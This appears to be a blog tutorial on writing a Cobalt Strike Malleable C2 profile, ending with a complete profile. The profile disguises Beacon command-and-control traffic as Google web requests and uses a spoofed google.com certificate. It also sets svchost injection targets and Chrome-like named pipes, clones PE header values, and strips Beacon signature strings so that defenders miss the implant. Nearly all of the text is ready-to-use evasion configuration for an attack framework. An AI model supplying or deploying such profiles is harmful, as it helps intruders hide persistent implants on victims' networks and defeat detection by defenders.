Welcome to Neehack Blogs

Create a Malleable C2 Profile for Cobalt Strike


The “Malleable C2” feature in Cobalt Strike allows you to customize the indicators of compromise (IOCs) and network traffic patterns generated by your Beacon implants. Malleable C2 allows you to make your communication patterns look like normal network traffic, making it harder for defenders to detect the activity.

You can find many preconfigured profiles from web I.e github here. But it is always recommend to avoid using default or well known profiles from the internet. For now, we will download one of the profiles from the github above and modify it to our own needs. The contents below modifies the jquery-c2.3.11.profile profile.

First of all modify “sample_name” option to the name you want to appear in the report titles. Usually this is the company name I.e Neehack, Inc.

set sample_name "Neehack, Inc"

The sleeptime option allows the beacon to call back Home (C2) after the specified time. It is recommended to have the sleep time to anything above 1 minutes with a “jitter” option that randomizes the sleeptime. The sleeptime option is in milliseconds while the jitter option is in percentage.

set sleeptime "60000" # Call home after every minute
set jitter    "43"    # Randomize the sleeptime

Next option is the default useragent header for the HTTP requests. Although, you can set this to anything you please, but it is recommended to use a standard user-agent for common web browsers.

The spawnto options in the Malleable C2 profile determine the process that will be spawned or injected when a new Beacon session is created. This can be useful for evading detection and blending in with legitimate network traffic. The default values currently set to the profile are good. But it do needs to be updated since the current syntex is deprected. The new syntax is below:

post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
}

pipename and pipename_stager options contains the name of the named pipe names used for the beacon to communicate with the C2. If you wish to change these options, make sure that the length of the names are less than 256 characters and does not contain blacklisted characters. For more information, please visit microsoft.com.

The dns_idle option allows you to change the IP address the DNS Beacon uses to signal that it’s idle. The default value is 0.0.0.0 and this is an indicator some use to zero-in on Cobalt Strike’s DNS Beacon payload. I recommend you set this option in your Malleable C2 profiles.

dns_stager_prepend option prepends text to payload stage delivered to DNS TXT record stager. I.e if your DNS TXT record being sent is hello_ahmad, then on delivery the value set to dns_stager_prepend will be appended to the start of hello_ahmad.

The syntax for DNS are also deprecated and requires the update below:

dns-beacon {
    set maxdns          "255";
    set dns_max_txt     "252";
    set dns_idle        "0.0.0.0"; #google.com (change this to match your campaign)
    set dns_sleep       "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_stager_prepend ".default.dns.123456.";
    set dns_stager_subhost ".default.dns.123456.";
}

http-stager options allows you to configure the stager payload which is responsible for download the stage payload/beacon.

uri_x86 and uri_x64 options are the endpoint URIs set to HTTP requests. It is recommended to set the stager options that reflects a standard request. I.e if the value of uri_x86 and uri_x64 are index.html. Set the output->prepend to the contents of an HTML text.

http-stager {                                                                                                                                                                                                                               
    set uri_x86 "/page1.html";                                                                                                                                                                                                              
    set uri_x64 "/page2.html";                                                                                                                                                                                                              
                                                                                                                                                                                                                                            
    server {                                                                                                                                                             
        header "Cache-Control" "max-age=0, no-cache";                                                                                                                                                                                       
        header "Pragma" "no-cache";                                                                                                                                                                                                         
        header "Connection" "keep-alive";                                                                                                                                                                                                   
        header "Content-Type" "application/javascript; charset=utf-8";                                                                                                                                                                      
        output {                                                                                                                                                                                                                            
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)                                                                                      
            prepend "!doctype html><html itemscope="" itemtype='http://schema.org/WebPage' lang='en-CA'><head><meta charset='UTF-8'><meta content='dark light' name='color-scheme'><meta content='origin' name='referrer'><meta content='"; 
            append "'http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZ
yYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>"                
            print;                                                                                                                                                                                                                          
        }                                                                                                                                                                                                                                   
    }                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                            
    client {                                                                                                                                                                                                                                
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";                                                                                                                                                  
        header "Accept-Language" "en-US,en;q=0.5";                                                                                                                                                                                          
        header "Host" "www.google.com";                                                                                                                                                                                                    
        header "Referer" "https://google.com/";                                                                                                                                                                                         
        header "Accept-Encoding" "gzip, deflate";                                                                                                                                                                                           
    }                                                                                                                                                                                                                                       
}

Since the Server header is not required, that is removed as above.

The Content-Type header is set to “text/html; charset=utf-8” since our HTTP request is to an html file.

The Host and Referer header is set to “google.com”

Next is the stage section. This section allows you to configure the actual beacon that is to be downloaded by the stager above.

stage {
    set userwx         "false"; 
    set stomppe        "true";
    set obfuscate      "true";
    set name           "srvhost.dll";
    set cleanup        "true";


    set checksum       "0";
        set compile_time   "11 Nov 2016 04:08:32";
        set entry_point    "650688";
        set image_size_x86 "4661248";
        set image_size_x64 "4661248";
        set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27
\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00";

    ## WARNING: Module stomping 

    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll"       ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll"   ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

In can set the stage to look like a real executable file also containing your beacon.

As warned by the profile, these options are important and needs to be carefully set. For now, you can leave these as is and modify it later when the options are understood.

The next section which is the http-get section, can be set to same as stager section above. There are few options that you need to pay attention to.

  1. mask option encodes the contents using XORs with a random key.
  2. base64url option encodes the data as base64 and URL safe so that it do not break the communication stream.
  3. Make sure that the URIs are unique

Next section is the http-post section which enables you to configure the HTTP post requests. Once again, this can be set as http-get, but it is highly recommended to configure this as a standard HTTP POST looking like request.

http-post {                                                                                                                                                                                                                              
    set uri "/api/a=pkd181&id=2024";                                                                                                                                                                                                         
    set verb "POST";                                                                                                                                                                                                                        
                                                                                                                                                                                                                                            
    client {                                                                                                                                                                                                                              
        header "Accept" "text/plain, charset=UTF-8";                                                                                                                                                  
        header "Host" "www.google.com";                                                                                                                                                                                                    
        header "Referer" "https://google.com/";                                                                                                                                                                                         
        header "Accept-Encoding" "gzip, deflate";                                                                                                                                                                                           
        header "Cookie" "GPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPgGPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPgGPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPg;"                                                                                                                                                                                 
        id {                                                                                                                                                                                                                                
            mask;                                                                                                                                                                                                                           
            base64url;                                                                                                                                                                                                                      
            parameter "__cqUb5";                                                                                                                                                                                                           
        }                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                            
        output {                                                                                                                                                                                                                            
            mask;                                                                                                                                                                                                                           
            base64url;                                                                                                                                                                                                                      
            print;                                                                                                                                                                                                                          
        }                                                                                                                                                                                                                                   
    }                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                            
    server {                                                                                                                                                                                              
        header "Cache-Control" "max-age=0, no-cache";                                                                                                                                                                                       
        header "Pragma" "no-cache";                                                                                                                                                                                                         
        header "Connection" "keep-alive";                                                                                                                                                                                                   
        header "Content-Type" "text/plain; charset=utf-8";                                                                                                                                                                      
                                                                                                                                                                                                                                            
        output {                                                                                                                                                                                                                            
            mask;                                                                                                                                                                                                                           
            base64url;                                                                                                                                                                                                                      
            prepend "id=218&render=True&action=post&contents=";
            append "length=2991&value=active&submit=true";                                                                             
            print;                                                                                                                                                                                                                          
        }                                                                                                                                                                                                                                   
    }                                                                                                                                                                                                                                       
}
  1. Since this is an HTTP POST request, the Accept header is changed to “text/plain, charset=UTF-8”
  2. A new Cookie header is created
  3. The prepend and append options are crafted to look like a post request

Full profile:

# Mlleable C2 Profile
# Version: CobaltStrike 3.11
# Description: 
#    c2 profile attempting to mimic a google request
# Modified by: @anawazish


# Original profile: https://github.com/digital-shokunin/malleable-c2/blob/master/jquery-c2.3.14.profile
set sample_name "Neehack, inc";
set sleeptime "60000";        # 1 Minute
set jitter    "28";            # % jitter


set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"; # Firefox 121.0.1 (64-bit) user agent

################################################
## SSL CERTIFICATE
################################################
## Description:
##    Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
## Defaults:
##    All certificate values are blank
## Guidelines:
##    - Best Option - Use a certifcate signed by a trusted certificate authority
##    - Ok Option - Create your own self signed certificate
##    - Option - Set self-signed certificate values
https-certificate {
    
set C   "US";
    set CN  "google.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}

################################################
## SpawnTo Process
################################################
## Description:
##    Default x86/x64 program to open and inject shellcode into
## Defaults:
##    spawnto_x86: 	%windir%\syswow64\rundll32.exe
##    spawnto_x64: 	%windir%\sysnative\rundll32.exe
## Guidelines
##    - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings
##      - sysnative for x64 and syswow64 for x86
##      - Example x64 : C:\WINDOWS\sysnative\w32tm.exe
##        Example x86 : C:\WINDOWS\syswow64\w32tm.exe
##    - The binary doesnt do anything wierd (protected binary, etc)
##    - !! Don't use these !! 
##    -   "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"
##    - A binary that executes without the UAC
##    - 64 bit for x64
##    - 32 bit for x86
post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
}
################################################
## SMB beacons
################################################
## Description:
##    Peer-to-peer beacon using SMB for communication
## Defaults:
##    pipename: msagent_##
##    pipename_stager: status_##
## Guidelines:
##    - Do not use an existing namedpipe, Beacon doesn't check for conflict!
##    - the ## is replaced with a number unique to a teamserver     
## ---------------------
#set pipename        "wkssvc_##";
#set pipename_stager "spoolss_##";
set pipename         "mojo.5688.8052.18389493978708887701"; # Common Chrome named pipe
set pipename_stager  "mojo.5688.8052.3578027332937047301"; # Common Chrome named pipe

################################################
## DNS beacons
################################################
## Description:
##    Beacon that uses DNS for communication
## Defaults:
##    maxdns: 255
##    dns_idle: 0.0.0.0
##    dns_max_txt: 252
##    dns_sleep: 0
##    dns_stager_prepend: N/A
##    dns_stager_subhost: .stage.123456.
##    dns_ttl: 1
## Guidelines:
##    - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels
dns-beacon {
    set maxdns          "255";
    set dns_max_txt     "252";
    set dns_idle        "0.0.0.0"; #default. Set to your own DNS IP
    set dns_sleep       "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_stager_prepend ".default.dns.123456.";
    set dns_stager_subhost ".default.dns.123456.";
}

################################################
## Staging process
################################################
## Description:
##    Malleable C2's http-stager block customizes the HTTP staging process
## Defaults:
##    uri_x86 Random String
##    uri_x64 Random String
##    HTTP Server Headers - Basic HTTP Headers
##    HTTP Client Headers - Basic HTTP Headers
## Guidelines:
##    - Add customize HTTP headers to the HTTP traffic of your campaign
##    - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc)

set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set

http-stager {  
    set uri_x86 "/page1.html";
    set uri_x64 "/page2.html";

    server {
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/html; charset=utf-8";
        output {
            prepend "!doctype html><html itemscope=\"\" itemtype='http://schema.org/WebPage' lang='en-CA'><head><meta charset='UTF-8'><meta content='dark light' name='color-scheme'><meta content='origin' name='referrer'><meta content=";
            append "'http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZyYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>";
	    print;
        }
    }

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
    }
}

################################################
## Memory Indicators
################################################
## Description:
##    The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon DLL.
## Values:
##    checksum      	0	The CheckSum value in Beacon's PE header
##    cleanup           false	Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it.
##    compile_time	    14 July 2009 8:14:00	The build time in Beacon's PE header
##    entry_point	    92145	The EntryPoint value in Beacon's PE header
##    image_size_x64	512000	SizeOfImage value in x64 Beacon's PE header
##    image_size_x86	512000	SizeOfImage value in x86 Beacon's PE header
##    module_x64	    xpsservices.dll	Same as module_x86; affects x64 loader
##    module_x86	    xpsservices.dll	Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
##    name	            beacon.x64.dll	The Exported name of the Beacon DLL
##    obfuscate	        false	Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers.
##    rich_header		Meta-information inserted by the compiler
##    stomppe	        true	Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
##    userwx	        false	Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory
## Guidelines:
##    - Modify the indicators to minimize in memory indicators
#     - Refer to 
##       https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/
stage {
    set userwx         "false"; 
    set stomppe        "true";
    set obfuscate      "true";
    set name           "srv.dll";
    set cleanup        "true";

    # Values captured using peclone agaist a Windows 10 version of explorer.exe
    set checksum       "0";
	set compile_time   "11 Jan 2024 011:38:11";
	set entry_point    "650688";
	set image_size_x86 "4661248";
	set image_size_x64 "4661248";
	set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    ## WARNING: Module stomping 
    # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
    # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
    # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
    # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
    # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4

    # set module_x64 "netshell.dll";
    # set module_x86 "netshell.dll";

    # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll"       ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll"   ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

################################################
## HTTP GET
################################################
## Description:
##    GET is used to poll teamserver for tasks
## Defaults:
##    uri "/activity"
##    Headers (Sample)
##      Accept: */*
##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
##      User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
## Guidelines:
##    - Add customize HTTP headers to the HTTP traffic of your campaign
##    - Analyze sample HTTP traffic to use as a reference
http-get {

    set uri "/default.html";
    set verb "GET";

    client {

        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";

        metadata {
            base64url;
            prepend "__cfduid=";
            header "Cookie";
        }
    }

    server {

        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/html; charset=utf-8";

        output {   
            mask;
            base64url;
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
	    prepend "!doctype html><html itemscope=\"\" itemtype=\"http://schema.org/WebPage\" lang=\"en-CA\"><head><meta charset=\"UTF-8\"><meta content=\"dark light\" name=\"color-scheme\"><meta content=\"origin\" name=\"referrer\"><meta content=";
            append  "'http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZyYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>";
	    print;
        }
    }
}

################################################
## HTTP POST
################################################
## Description:
##    POST is used to send output to the teamserver
##    Can use HTTP GET or POST to send data
##    Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
## Defaults:
##    uri "/activity"
##    Headers (Sample)
##      Accept: */*
##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
##      User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
## Guidelines:
##    - Decide if you want to use HTTP GET or HTTP POST requests for this section
##    - Add customize HTTP headers to the HTTP traffic of your campaign
##    - Analyze sample HTTP traffic to use as a reference
## Use HTTP POST for http-post section
## Uncomment this Section to activate
http-post {

    set uri "/api/i=182&id=2592";
    set verb "POST";

    client {

        header "Accept" "text/plain, charset=UTF-8";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
        header "Cookie" "to02JiZxXQXNbpjTUxJfFKhJqYD6gboU;YoL6r7gv2Nsy2IMrdJg1iR8OEqgkgdzQ;name=XACXPrcRLxvfaGQgEEuIRoNOPW8GQ1cf";
        id {
            mask;       
            base64url;
            parameter "__ws9zc.n7z3gwf";            
        }
              
        output {
            mask;
            base64url;
            print;
        }
    }

    server {

        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/plain; charset=utf-8";

        output {
            mask;
            base64url;
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
            # 2nd Line            
            # 1st Line
            prepend "id=2024&post=double&render=true&contents=";
            append "length=1055&status=active&submit=true";
	    print;
        }
    }
}

Conclusion

Cobalt strike provides many flexibilities on how you want to configure your beacon. I do want to remind you that these options requires your attention and thought process to uniquely configure a profile based on your needs. The profile above may be found by the blue team.


Leave a Reply

Your email address will not be published.